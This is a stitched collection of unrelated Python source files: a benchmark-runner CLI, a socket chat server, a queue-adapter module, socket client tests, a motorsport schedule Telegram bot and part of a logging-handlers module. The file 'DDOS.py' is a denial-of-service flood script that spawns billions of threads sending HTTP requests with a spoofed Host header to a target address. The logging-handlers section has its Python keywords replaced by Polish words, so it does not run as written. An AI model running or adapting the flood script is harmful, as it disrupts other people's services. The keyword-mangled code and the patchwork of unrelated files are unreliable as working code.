    parser.add_argument("--names", nargs="*", help="Limit benchmarks to given names")
    parser.add_argument("--regex", help="Limit benchmarks to names matching the regex")
    parser.add_argument("--not-regex", help="Limit benchmarks to names not matching the regex")
    parser.add_argument("--html", action="store_true", help="Generate HTML summary")
    parser.add_argument("--html-output-dir", default="html", help="Output directory for generated HTML")
    parser.add_argument("--plot", action="store_true", help="Generate plots with results summary")
    parser.add_argument("--plot-format", default="png", help="Specify plots file format (default=png)")
    parser.add_argument("--plot-backend", default="Agg", help="Optionally specify matplotlib GUI backend")
    parser.add_argument("--plot-transparent", action="store_true", help="Use transparent background when saving plots")
    parser.add_argument("--plot-output-dir", default="plots", help="Specify where to save the plots")
    parser.add_argument("--plot-theme", default="default", help="Use different matplotlib theme")
    parser.add_argument("--fail-fast", action="store_true", help="Exit on any benchmark error, do not continue")
    parser.add_argument("--output-dir", default="build", help="Directory to store benchmark build output")
    parser.add_argument("--njobs", default=0, type=int, help="Use N parallel jobs to run benchmarks (default=0, which uses CPU count)")
    parser.add_argument("--heartbeat", default=0, type=int, help="Print heartbeat message with given interval (default=0 => never)")
    parser.add_argument("--timeout", default=None, help="Set timeout for a single benchmark")
    parser.add_argument("--results-cache", help="""Use given JSON file as results cache. If the file exists,
                        it will be loaded instead of running actual benchmarks,
                        else benchmarks will be run normally, and then saved
                        to the given file. This allows to easily rerun the script
                        to generate different summary without having to rerun benchmarks.""")
    args = parser.parse_args(argv)

    # `_summary` is a module-level flag (set elsewhere in this file, presumably
    # on import success of the summary/plotting dependencies); without it and
    # without a cache file the run would produce nothing observable.
    if not args.results_cache and not _summary:
        print("Summary not available and not running with --results-cache - run would not produce any results! Aborting.",
              file=sys.stderr)
        sys.exit(1)

    # Load and filter configurations
    configurations = BenchmarkConfiguration.load_yaml(args.config)
    # Each filter is applied only when its CLI argument was given.
    filters = {
        "regex": lambda config: re.search(args.regex, config.name),
        "not_regex": lambda config: not re.search(args.not_regex, config.name),
        "names": lambda config: config.name in args.names,
    }
    for arg, f in filters.items():
        if getattr(args, arg):
            configurations = filter(f, configurations)
    configurations = list(configurations)

    # Load outputs from cache if it exists
    cache_exists = args.results_cache and os.path.isfile(args.results_cache)
    if args.results_cache and cache_exists:
        cache = RunCache.load_json(args.results_cache)
        # Take only those that match configurations
        names_to_load = [c.name for c in configurations]
        run_data = [data for data in cache if data.config.name in names_to_load]
    else: # Run all the benchmarks normally
        if args.heartbeat:
            # Background shell loop printing a liveness message every N seconds.
            heartbeat_cmd = ["/bin/sh", "-c", "while true; do sleep %d; echo Heartbeat...; done" % args.heartbeat]
            heartbeat = subprocess.Popen(heartbeat_cmd)
        if args.timeout is not None:
            args.timeout = int(args.timeout)
        run_data = run_benchmarks(configurations, args.output_dir, args.njobs, not args.fail_fast, args.timeout)
        if args.heartbeat:
            heartbeat.kill()

    # Store outputs in cache
    if args.results_cache and not cache_exists:
        cache = RunCache(run_data)
        cache.dump_json(args.results_cache)

    # Display summary
    if _summary:
        summary = ResultsSummary(run_data)
        summary.text_summary()
        if args.html:
            summary.html_summary(args.html_output_dir)
        if args.plot:
            summary.plot_summary(
                plots_dir=args.plot_output_dir,
                backend=args.plot_backend,
                theme=args.plot_theme,
                save_format=args.plot_format,
                transparent=args.plot_transparent,
            )

    # Exit with error when there is no single benchmark that succeeded
    succeeded = sum(1 if d.result is not None else 0 for d in run_data)
    if succeeded == 0:
        sys.exit(1)
# Script entry point.
if __name__ == "__main__":
    main()
|
Server.py | import socket
from threading import Thread
from clint.textui import colored
# One-shot chat server: bind on a user-chosen port, accept a single client,
# then exchange display names before the send/receive loops start.
s = socket.socket()
port = int(input("Port: "))
name = input("Your Name: ")
s.bind(('', port))
s.listen(5)
# Blocks until a client connects; `c` is shared by receive()/send() below.
c, addr = s.accept()
c.send(name.encode())
print ("Connection found",addr)
cname = c.recv(1024).decode()
print("ClientName: " + colored.red(cname) + "\n")
def receive():
    """Print messages from the client until it says bye or disconnects."""
    while 1:
        rcvdData = c.recv(1024).decode()
        # BUG FIX: recv() returns '' once the peer closes the connection;
        # without this check the loop spins forever printing empty lines.
        if not rcvdData:
            break
        print (colored.red("\n" + cname + ": "), rcvdData)
        print("")
        if(rcvdData == "bye" or rcvdData == "Bye"):
            print("\n+++++++++++++++++++++++++++++++++++")
            print(colored.blue("Connection ended (Press Enter to exit)"))
            print("+++++++++++++++++++++++++++++++++++\n")
            break
    c.close()
def send():
    """Forward stdin lines to the client until the operator types bye."""
    while True:
        message = input()
        c.send(message.encode())
        if message in ("Bye", "bye"):
            print("\n++++++++++++++++++++++")
            print(colored.blue("Connection ended"))
            print("++++++++++++++++++++++\n")
            break
    c.close()
def main():
    """Run the receive and send loops concurrently."""
    for task in (receive, send):
        Thread(target=task).start()

if __name__ == '__main__':
    main()
|
DDOS.py | import socket
import threading
target = '192.168.1.1'
fake_ip = '192.168.1.100'
port = 80
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
s.close()
for i in range(5000000000):
thread = threading.Thread(target=attack)
thread.start()
print(thread) |
queue_adapter.py | # coding: utf-8
from __future__ import unicode_literals
"""
This module contains contracts for defining adapters to various queueing systems, e.g. PBS/SLURM/SGE.
"""
import os
import shlex
import string
import subprocess
import threading
import traceback
import abc
import collections
import six
import warnings
from fireworks.utilities.fw_serializers import FWSerializable, serialize_fw
from fireworks.utilities.fw_utilities import get_fw_logger
__author__ = 'Anubhav Jain'
__credits__ = 'Shyue Ping Ong'
__copyright__ = 'Copyright 2013, The Materials Project'
__version__ = '0.1'
__maintainer__ = 'Anubhav Jain'
__email__ = 'ajain@lbl.gov'
__date__ = 'Feb 28, 2013'
class Command(object):
    """
    Helper class - run subprocess commands in a different thread with TIMEOUT option.
    From https://gist.github.com/kirpit/1306188
    Based on jcollado's solution:
    http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
    """
    command = None
    process = None
    status = None
    output, error = '', ''

    def __init__(self, command):
        """
        initialize the object.

        Args:
            command: command to run (a string is tokenized with shlex)
        """
        if isinstance(command, six.string_types):
            command = shlex.split(command)
        self.command = command

    def run(self, timeout=None, **kwargs):
        """
        Run the command.

        Args:
            timeout (float): seconds to wait before terminating the process
            kwargs (dict): forwarded to subprocess.Popen

        Returns:
            (status, output, error); status is -1 if launching/running failed
        """
        def target(**kwargs):
            try:
                self.process = subprocess.Popen(self.command, **kwargs)
                self.output, self.error = self.process.communicate()
                self.status = self.process.returncode
                # Python3 - need to convert bytes to string
                if isinstance(self.output, bytes):
                    self.output = self.output.decode("utf-8")
                if isinstance(self.error, bytes):
                    self.error = self.error.decode("utf-8")
            except Exception:
                # Was a bare `except:`, which also swallowed SystemExit and
                # KeyboardInterrupt raised inside the worker thread.
                self.error = traceback.format_exc()
                self.status = -1

        # default stdout and stderr
        if 'stdout' not in kwargs:
            kwargs['stdout'] = subprocess.PIPE
        if 'stderr' not in kwargs:
            kwargs['stderr'] = subprocess.PIPE
        # run `target` on a worker thread so the timeout can be enforced here
        thread = threading.Thread(target=target, kwargs=kwargs)
        thread.start()
        thread.join(timeout)
        if thread.is_alive():
            # Timed out: kill the child, but only if Popen actually started it
            # (self.process stays None when Popen itself raised, and calling
            # terminate() on None crashed here in the original).
            if self.process is not None:
                self.process.terminate()
            thread.join()
        return self.status, self.output, self.error
class QueueAdapterBase(collections.defaultdict, FWSerializable):
    """
    The QueueAdapter is responsible for all interactions with a specific queue management system.
    This includes handling all details of queue script format as well as queue submission and
    management.

    A user should extend this class with implementations that work on specific queue systems.
    Examples and implementations are in: fireworks/user_objects/queue_adapters.

    Documentation on implementing queue adapters can be found on FireWorks home page,
    https://materialsproject.github.io/fireworks
    """
    _fw_name = 'QueueAdapterBase'
    template_file = 'OVERRIDE_ME'  # path to template file for a queue script
    submit_cmd = 'OVERRIDE_ME'  # command to submit jobs, e.g. "qsub" or "squeue"
    q_name = 'OVERRIDE_ME'  # (arbitrary) name, e.g. "pbs" or "slurm"
    defaults = {}  # default parameter values for template

    def get_script_str(self, launch_dir):
        """
        returns a (multi-line) String representing the queue script, e.g. PBS script.
        Uses the template_file along with internal parameters to create the script.

        Args:
            launch_dir (str): The directory the job will be launched in

        Returns:
            (str) the queue script
        """
        with open(self.template_file) as f:
            template = f.read()
        a = QScriptTemplate(template)
        # get keys defined by template
        # NOTE(review): string.Formatter parses "{}"-style fields, while
        # QScriptTemplate substitutes "$$"-style placeholders below; the
        # unknown-key warning may be unreliable for "$$" templates -- confirm.
        template_keys = [i[1] for i in string.Formatter().parse(template)]
        # set substitution dict for replacements into the template
        subs_dict = {k: v for k, v in self.items()
                     if v is not None}  # clean null values
        # warn user if they specify a key not present in template
        for subs_key in subs_dict.keys():
            if subs_key not in template_keys and not \
                    subs_key.startswith("_") and not subs_key == "logdir":
                warnings.warn('Key {} has been specified in qadapter '
                              'but it is not present in template, please '
                              'check template ({}) for supported keys.'
                              .format(subs_key, self.template_file))
        # fill in missing values from the class-level defaults
        for k, v in self.defaults.items():
            subs_dict.setdefault(k, v)
        subs_dict['job_name'] = subs_dict.get('job_name', 'FW_job')
        launch_dir = os.path.abspath(launch_dir)
        subs_dict['launch_dir'] = launch_dir
        # might contain unused parameters as leftover $$
        unclean_template = a.safe_substitute(subs_dict)
        # drop lines whose "$$" placeholders were not substituted
        clean_template = filter(lambda l: "$$" not in l,
                                unclean_template.split('\n'))
        return '\n'.join(clean_template)

    @abc.abstractmethod
    def submit_to_queue(self, script_file):
        """
        Submits the job to the queue and returns the job id.

        Args:
            script_file: (str) name of the script file to use (String)

        Returns:
            (int) job_id
        """
        pass

    @abc.abstractmethod
    def get_njobs_in_queue(self, username=None):
        """
        Returns the number of jobs currently in the queue for the user.

        Args:
            username (str): the username of the jobs to count (default is to autodetect)

        Returns:
            (int) number of jobs in the queue
        """
        pass

    @serialize_fw
    def to_dict(self):
        # The adapter's state is just its dict contents (it IS a defaultdict).
        return dict(self)

    @classmethod
    def from_dict(cls, m_dict):
        return cls(m_dict)

    def get_qlogger(self, name):
        # Log to self['logdir'] when configured, otherwise effectively silence
        # output by only streaming CRITICAL records.
        if 'logdir' in self:
            return get_fw_logger(name, self['logdir'])
        else:
            return get_fw_logger(name, stream_level='CRITICAL')
class QScriptTemplate(string.Template):
    # Queue script templates use "$$var" placeholders instead of the
    # string.Template default "$var", so literal shell "$VAR" text survives.
    delimiter = '$$'
|
client.test.py | import asyncore
import logging
import socket
import sys
import time
import unittest
from threading import Thread
from gym_donkeycar.core.sim_client import SDClient
# Route all DEBUG-and-above log records to stdout with a timestamped format.
root = logging.getLogger()
root.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler.setFormatter(formatter)
root.addHandler(handler)
# Address of the local echo server used by the tests below.
host = "localhost"
port = 10000
class EchoHandler(asyncore.dispatcher_with_send):
    """Asyncore handler that logs and echoes back everything it receives."""

    def handle_read(self):
        payload = self.recv(8192)
        if not payload:
            return
        root.info("Server got %s" % payload)
        self.send(payload)
class TestServer(asyncore.dispatcher):
    """Minimal asyncore echo server whose polling loop runs on its own thread."""

    def __init__(self, host, port):
        asyncore.dispatcher.__init__(self)
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        self.set_reuse_addr()
        self.bind((host, port))
        self.listen(5)
        self.processing_loop = True
        self.handler = None
        self.th = Thread(target=self.loop, args=())
        self.th.start()

    def handle_accept(self):
        pair = self.accept()
        if pair is not None:
            sock, addr = pair
            root.info("Incoming connection from %s" % repr(addr))
            self.handler = EchoHandler(sock)

    def stop(self):
        root.info("Stopping Server")
        self.processing_loop = False
        self.th.join()
        # BUG FIX: the original never closed the accepted connection nor the
        # listening socket, leaking both and keeping the port bound until
        # interpreter exit.
        if self.handler is not None:
            self.handler.close()
        self.close()
        root.info("Server stopped")

    def loop(self):
        # Poll asyncore manually so the loop can be stopped via the flag.
        while self.processing_loop:
            asyncore.loop(count=1)
            time.sleep(0.01)
class SUT(SDClient):
    """System under test: records every JSON packet delivered by SDClient."""

    def __init__(self, address):
        super().__init__(*address, poll_socket_sleep_time=0.01)
        # Start from a clean slate; reInit() sets both counters.
        self.reInit()

    def on_msg_recv(self, json_packet):
        root.info("Got %s" % json_packet)
        self.receivedMsg = json_packet
        self.receivedCount += 1

    def reInit(self):
        self.receivedMsg = None
        self.receivedCount = 0
class SDClientTest(unittest.TestCase):
    """Integration tests for SDClient newline-delimited JSON framing.

    The fixed 1-second sleeps give the client's polling thread time to
    process each TCP fragment before the assertion runs.
    """
    @classmethod
    def setUpClass(self):
        # NOTE(review): the first parameter of a classmethod is conventionally
        # named `cls`; `self` here is actually the class object.
        self.server = TestServer(host, port)
        time.sleep(1)
    @classmethod
    def tearDownClass(self):
        self.server.stop()
    def setUp(self):
        self.SUT = SUT((host, port))
        time.sleep(1)
        self.SUT.reInit()
    def tearDown(self):
        self.SUT.stop()
    def test_simpleMessage(self):
        # One newline-terminated packet => exactly one delivered message.
        self.server.handler.send(b'{"msg_type":"test1"}\n')
        time.sleep(1)
        self.assertTrue(self.SUT.receivedCount == 1)
    def test_simpleMessageUndelimited(self):
        # A complete JSON object without a trailing newline is still delivered.
        self.server.handler.send(b'{"msg_type":"test2"}')
        time.sleep(1)
        self.assertTrue(self.SUT.receivedCount == 1)
    def test_SimpleConcat(self):
        # Two packets arriving in a single TCP segment.
        self.server.handler.send(b'{"msg_type":"test3"}\n{"msg_type":"test31"}')
        time.sleep(1)
        self.assertTrue(self.SUT.receivedCount == 2)
    def test_uncompletePayload(self):
        # Truncated JSON must not be delivered.
        self.server.handler.send(b'{"msg_type":"test4","tutu":')
        time.sleep(1)
        self.assertTrue(self.SUT.receivedCount == 0)
    def test_fragmentedPayload1(self):
        # Payload split right before the closing brace.
        self.server.handler.send(b'{"msg_type":"test5"')
        time.sleep(1)
        self.server.handler.send(b'}\n{"msg_type":"test51"}\n')
        time.sleep(1)
        self.assertEqual(self.SUT.receivedCount, 2)
    def test_fragmentedPayload2(self):
        # Payload split in the middle of a key/value pair.
        self.server.handler.send(b'{"msg_type":')
        time.sleep(1)
        self.server.handler.send(b'"test6"}\n{"msg_type":"test61"}\n')
        time.sleep(1)
        self.assertEqual(self.SUT.receivedCount, 2)
    def test_fragmentedPayload3(self):
        # Three messages spread over three fragments.
        self.server.handler.send(b'{"msg_type":"test7"')
        time.sleep(1)
        self.server.handler.send(b'}\n{"msg_type":"test71"}\n{"msg_type":')
        time.sleep(1)
        self.server.handler.send(b'"test72"}')
        time.sleep(1)
        self.assertEqual(self.SUT.receivedCount, 3)
    def test_fragmentedPayload4(self):
        # Two messages over three fragments.
        self.server.handler.send(b'{"msg_type":"test8"')
        time.sleep(1)
        self.server.handler.send(b'}\n{"msg_type":')
        time.sleep(1)
        self.server.handler.send(b'"test81"}')
        time.sleep(1)
        self.assertEqual(self.SUT.receivedCount, 2)
    def test_fragmentedPayload5(self):
        # Fragment boundary directly after the opening brace.
        self.server.handler.send(b'{"msg_type":"test9"')
        time.sleep(1)
        self.server.handler.send(b"}\n{")
        time.sleep(1)
        self.server.handler.send(b'"msg_type":"test91"}\n')
        time.sleep(1)
        self.assertEqual(self.SUT.receivedCount, 2)
# Run the test suite when executed as a script.
if __name__ == "__main__":
    unittest.main()
|
motor.py | from bot import EventBot
from urllib.request import urlopen
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
from threading import Thread
from time import sleep
# implementation of EventBot to track motorsport schedules from ESPN
# Deployment placeholders: the Telegram channel id for alerts and the bot API
# token must be filled in before running (note: -0 is just 0).
MOTOR_CHANNEL = -0
TOKEN = ""
# processes schedules from ESPN.com
def process_espn(url, label):
    """Scrape an ESPN racing schedule table into EventBot-style race dicts.

    Args:
        url: ESPN schedule page URL.
        label: group label attached to every returned race.

    Returns:
        list of dicts with 'group', 'event', 'datetime' and 'channel' keys.
    """
    races = []
    # get rows of table
    page = urlopen(url)
    html = page.read().decode("utf-8")
    soup = BeautifulSoup(html, "html.parser")
    rows = soup.table.find_all("tr")
    rows.pop(0)  # drop the header row
    for row in rows:
        cells = row.find_all("td")
        if len(cells) >= 4:
            # combine date and time (spread over several strings), then interpret
            date = ''
            for s in cells[0].strings:
                if date:
                    date += ' '
                date += s
            date = date.replace('Noon', '12:00 PM')
            if date != 'DATE':  # skip repeated in-table header cells
                dt = datetime.strptime(date, '%a, %b %d %I:%M %p ET')
                # use track as race name
                race = ''
                for s in cells[1].strings:
                    if not race:
                        race = s
                    # interpret postponed dates (overrides dt parsed above)
                    elif s.startswith("**Race postponed to "):
                        date = s[s.index(' to ')+4:]
                        dt = datetime.strptime(date, '%B %d at %I:%M %p')
                # remove annoying extract cup series text
                if race.startswith('NASCAR') and ' at ' in race:
                    start = race.index(' at ') + 4
                    race = race[start:]
                elif race.startswith('NASCAR'):
                    start = race.upper().index('SERIES') + 7
                    race = race[start:]
                # add the current year and remove an hour for central time
                dt = dt.replace(year=datetime.now().year)
                dt = dt - timedelta(hours=1)
                tv = cells[2].string
                if tv is None:
                    tv = 'Unknown'
                # combine into EventBot compatible dictionary
                races.append({
                    'group': label,
                    'event': race,
                    'datetime': dt,
                    'channel': tv
                })
    return races
# while ESPN has an F1 schedule like NASCAR and Indy, there is a slightly better version
def process_espn_f1(url, label):
    """Scrape the ESPN F1 schedule page into EventBot-style race dicts.

    Args:
        url: ESPN F1 schedule page URL.
        label: group label attached to every returned race.

    Returns:
        list of dicts with 'group', 'event', 'datetime' and 'channel' keys.
    """
    races = []
    # get rows of table
    page = urlopen(url)
    html = page.read().decode("utf-8")
    soup = BeautifulSoup(html, "html.parser")
    rows = soup.tbody.find_all("tr")
    rows.pop(0)  # drop the header row
    for row in rows:
        cells = row.find_all("td")
        # interpret date time
        date = cells[2].string
        # BUG FIX: rows whose date cell lacks " - " (e.g. already-run races)
        # used to fall through and be appended with `dt` either unbound
        # (NameError on the first row) or stale from the previous row.
        if " - " not in date:
            continue
        dt = datetime.strptime(date, '%b %d - %I:%M %p')
        # add the current year and remove an hour for central time
        dt = dt.replace(year=datetime.now().year)
        dt = dt - timedelta(hours=1)
        # interpret race name: first string inside the cell
        race = ''
        for s in cells[1].strings:
            if not race:
                race = s
        tv = cells[3].string
        if tv is None:
            tv = 'Unknown'
        # combine into EventBot compatible dictionary
        races.append({
            'group': label,
            'event': race,
            'datetime': dt,
            'channel': tv
        })
    return races
# processes schedules from IMSA
def process_imsa(url, label):
    """Scrape the IMSA TV/streaming schedule into EventBot-style race dicts.

    Args:
        url: IMSA schedule page URL.
        label: group label attached to every returned race.

    Returns:
        list of dicts with 'group', 'event', 'datetime' and 'channel' keys.
    """
    races = []
    # get rows of table
    page = urlopen(url)
    html = page.read().decode("utf-8")
    soup = BeautifulSoup(html, "html.parser")
    rows = soup.find_all("div", class_="rich-text-component-container")
    rows.pop(0)  # drop the leading non-event container
    for row in rows:
        name = row.find("a", class_="onTv-event-title").string.strip()
        date = row.find("span", class_="date-display-single").string.split(' -')[0]
        dt = datetime.strptime(date, '%A, %B %d, %Y – %I:%M %p')
        # remove an hour for central time
        dt = dt - timedelta(hours=1)
        # determine TV channel by image
        tvimg = row.img['src'].upper()
        tv = 'IMSA TV'
        if 'TRACKPASS' in tvimg:
            tv = 'TrackPass'
        elif 'PEACOCK' in tvimg:
            tv = 'Peacock'
        elif 'NBC' in tvimg:
            tv = 'NBC'
        # combine into EventBot compatible dictionary
        # if not qualifying
        #if "QUALIFYING" not in name.upper():
        # hide second day broadcasts starting at midnight eastern
        if dt.hour != 23 or dt.minute != 0:
            races.append({
                'group': label,
                'event': name,
                'datetime': dt,
                'channel': tv
            })
    # remove duplicate listings where one is IMSA TV: when two adjacent events
    # start within 30 minutes and exactly one of them is on IMSA TV, keep the
    # real-TV listing and drop the IMSA TV one.
    remove = []
    for i in range(len(races)):
        if i + 1 < len(races):
            if abs(races[i]['datetime'] - races[i+1]['datetime']) < timedelta(minutes=30) and (races[i]['channel'] == 'IMSA TV' or races[i+1]['channel'] == 'IMSA TV') and (races[i]['channel'] != 'IMSA TV' or races[i+1]['channel'] != 'IMSA TV'):
                if races[i]['channel'] == 'IMSA TV':
                    remove.append(i)
                elif races[i+1]['channel'] == 'IMSA TV':
                    remove.append(i+1)
    # delete from the end so earlier indices stay valid
    for i in sorted(remove, reverse=True):
        del races[i]
    return races
# processes schedules from ENASCAR.com
def process_enascar(url, label):
    """Scrape the eNASCAR schedule into EventBot-style race dicts.

    Args:
        url: eNASCAR schedule page URL.
        label: group label attached to every returned race.

    Returns:
        list of dicts with 'group', 'event', 'datetime' and 'channel' keys.
    """
    races = []
    # get rows of table
    page = urlopen(url)
    html = page.read().decode("utf-8")
    soup = BeautifulSoup(html, "html.parser")
    rows = soup.find_all("div", class_='tableRowContainer', recursive=True)
    rows.pop(0)  # drop the header row
    for row in rows:
        name = row.find('div', class_='trackCell').string
        watch = row.find('div', class_='watchCell').string
        # time only listed for upcoming events
        # NOTE(review): this is a substring test, so any watch text containing
        # "on" (not just the word) passes — confirm against the live markup.
        if 'on' in watch:
            parts = watch.split()
            date = '{0} {1}'.format(row.find('div', class_='dateCell').string, parts[0])
            dt = datetime.strptime(date, '%B %d, %Y %I%p')
            # remove an hour for central time
            dt = dt - timedelta(hours=1)
            races.append({
                'group': label,
                'event': name,
                'datetime': dt,
                'channel': parts[-1]
            })
    return races
# create bot
bot = EventBot(TOKEN, "Motorsport Bot", "It sources NASCAR, IndyCar, and F1 schedules from ESPN.com", "series", "race")
# NOTE: each handler below reuses the name read_msg; that is harmless because
# the decorator registers the function object before the name is rebound.
# handle /next
@bot.tb.message_handler(commands=['next'])
def read_msg(msg):
    bot.next_msg(msg)
# handle /last
@bot.tb.message_handler(commands=['last'])
def read_msg(msg):
    bot.last_msg(msg)
# handle /time
@bot.tb.message_handler(commands=['time'])
def read_msg(msg):
    bot.time_msg(msg)
# handle /about
@bot.tb.message_handler(commands=['about'])
def read_msg(msg):
    bot.about_msg(msg)
# handle /help
@bot.tb.message_handler(commands=['help'])
def read_msg(msg):
    bot.help_msg(msg)
# handle /groups
@bot.tb.message_handler(commands=['groups'])
def read_msg(msg):
    bot.groups_msg(msg)
# handle all other messages
@bot.tb.message_handler(func=lambda _: True)
def read_msg(msg):
    bot.default_msg(msg)
# thread to update list of races every day
def add_races(bot):
    """Daemon loop: rebuild the full race list once per day and push alerts."""
    sources = (
        (process_espn, "https://www.espn.com/racing/schedule", "NCS"),
        (process_espn, "https://www.espn.com/racing/schedule/_/series/xfinity", "NXS"),
        (process_espn, "https://www.espn.com/racing/schedule/_/series/camping", "NCWTS"),
        (process_espn, "https://www.espn.com/racing/schedule/_/series/indycar", "INDY"),
        (process_espn_f1, "https://www.espn.com/f1/schedule", "F1"),
        (process_imsa, "https://www.imsa.com/weathertech/tv-streaming-schedule/", "IMSA"),
        (process_enascar, "https://www.enascar.com/schedule/", "ENAS"),
    )
    while True:
        races = []
        for scraper, url, series_label in sources:
            races.extend(scraper(url, series_label))
        races.sort(key=lambda r: r['datetime'])
        bot.update_events(races)
        bot.schedule_alerts(MOTOR_CHANNEL)
        sleep(60 * 60 * 24)
# start all threads, give add_races a chance before other threads start
Thread(target=add_races, daemon=True, args=(bot,)).start()
sleep(10)
# blocks forever polling Telegram for messages
bot.listen()
|
handlers.py | # Copyright 2001-2015 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, oraz distribute this software oraz its
# documentation dla any purpose oraz without fee jest hereby granted,
# provided that the above copyright notice appear w all copies oraz that
# both that copyright notice oraz this permission notice appear w
# supporting documentation, oraz that the name of Vinay Sajip
# nie be used w advertising albo publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers dla the logging package dla Python. The core package jest
based on PEP 282 oraz comments thereto w comp.lang.python.
Copyright (C) 2001-2015 Vinay Sajip. All Rights Reserved.
To use, simply 'zaimportuj logging.handlers' oraz log away!
"""
zaimportuj logging, socket, os, pickle, struct, time, re
z stat zaimportuj ST_DEV, ST_INO, ST_MTIME
zaimportuj queue
spróbuj:
zaimportuj threading
wyjąwszy ImportError: #pragma: no cover
threading = Nic
#
# Some constants...
#
# Default ports for the socket/HTTP/SOAP logging handlers and syslog.
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
klasa BaseRotatingHandler(logging.FileHandler):
    """
    Base class for handlers that rotate log files at a certain point.
    Not meant to be instantiated directly. Instead, use RotatingFileHandler
    or TimedRotatingFileHandler.
    """
    def __init__(self, filename, mode, encoding=Nic, delay=Nieprawda):
        """
        Use the specified filename for streamed logging.
        """
        logging.FileHandler.__init__(self, filename, mode, encoding, delay)
        self.mode = mode
        self.encoding = encoding
        self.namer = Nic
        self.rotator = Nic
    def emit(self, record):
        """
        Emit a record.

        Output the record to the file, catering for rollover as described
        in doRollover().
        """
        spróbuj:
            jeżeli self.shouldRollover(record):
                self.doRollover()
            logging.FileHandler.emit(self, record)
        wyjąwszy Exception:
            self.handleError(record)
    def rotation_filename(self, default_name):
        """
        Modify the filename of a log file when rotating.

        This is provided so that a custom filename can be provided.

        The default implementation calls the 'namer' attribute of the
        handler, if it's callable, passing the default name to
        it. If the attribute isn't callable (the default is None), the name
        is returned unchanged.

        :param default_name: The default name for the log file.
        """
        jeżeli nie callable(self.namer):
            result = default_name
        inaczej:
            result = self.namer(default_name)
        zwróć result
    def rotate(self, source, dest):
        """
        When rotating, rotate the current log.

        The default implementation calls the 'rotator' attribute of the
        handler, if it's callable, passing the source and dest arguments to
        it. If the attribute isn't callable (the default is None), the source
        is simply renamed to the destination.

        :param source: The source filename. This is normally the base
                       filename, e.g. 'test.log'
        :param dest: The destination filename. This is normally
                     what the source is rotated to, e.g. 'test.log.1'.
        """
        jeżeli nie callable(self.rotator):
            # Issue 18940: A file may not have been created if delay is True.
            jeżeli os.path.exists(source):
                os.rename(source, dest)
        inaczej:
            self.rotator(source, dest)
klasa RotatingFileHandler(BaseRotatingHandler):
    """
    Handler for logging to a set of files, which switches from one file
    to the next when the current file reaches a certain size.
    """
    def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=Nic, delay=Nieprawda):
        """
        Open the specified file and use it as the stream for logging.

        By default, the file grows indefinitely. You can specify particular
        values of maxBytes and backupCount to allow the file to rollover at
        a predetermined size.

        Rollover occurs whenever the current log file is nearly maxBytes in
        length. If backupCount is >= 1, the system will successively create
        new files with the same pathname as the base file, but with extensions
        ".1", ".2" etc. appended to it. For example, with a backupCount of 5
        and a base file name of "app.log", you would get "app.log",
        "app.log.1", "app.log.2", ... through to "app.log.5". The file being
        written to is always "app.log" - when it gets filled up, it is closed
        and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
        exist, then they are renamed to "app.log.2", "app.log.3" etc.
        respectively.

        If maxBytes is zero, rollover never occurs.
        """
        # If rotation/rollover is wanted, it doesn't make sense to use another
        # mode. If for example 'w' were specified, then if there were multiple
        # runs of the calling application, the logs from previous runs would be
        # lost if the 'w' is respected, because the log file would be truncated
        # on each run.
        jeżeli maxBytes > 0:
            mode = 'a'
        BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
        self.maxBytes = maxBytes
        self.backupCount = backupCount
    def doRollover(self):
        """
        Do a rollover, as described in __init__().
        """
        jeżeli self.stream:
            self.stream.close()
            self.stream = Nic
        jeżeli self.backupCount > 0:
            # Shift existing backups up by one: .1 -> .2, .2 -> .3, ...
            dla i w range(self.backupCount - 1, 0, -1):
                sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
                dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
                                                        i + 1))
                jeżeli os.path.exists(sfn):
                    jeżeli os.path.exists(dfn):
                        os.remove(dfn)
                    os.rename(sfn, dfn)
            dfn = self.rotation_filename(self.baseFilename + ".1")
            jeżeli os.path.exists(dfn):
                os.remove(dfn)
            self.rotate(self.baseFilename, dfn)
        jeżeli nie self.delay:
            self.stream = self._open()
    def shouldRollover(self, record):
        """
        Determine if rollover should occur.

        Basically, see if the supplied record would cause the file to exceed
        the size limit we have.
        """
        jeżeli self.stream jest Nic: # delay was set...
            self.stream = self._open()
        jeżeli self.maxBytes > 0: # are we rolling over?
            msg = "%s\n" % self.format(record)
            self.stream.seek(0, 2) # due to non-posix-compliant Windows feature
            jeżeli self.stream.tell() + len(msg) >= self.maxBytes:
                zwróć 1
        zwróć 0
klasa TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler dla logging to a file, rotating the log file at certain timed
intervals.
If backupCount jest > 0, when rollover jest done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
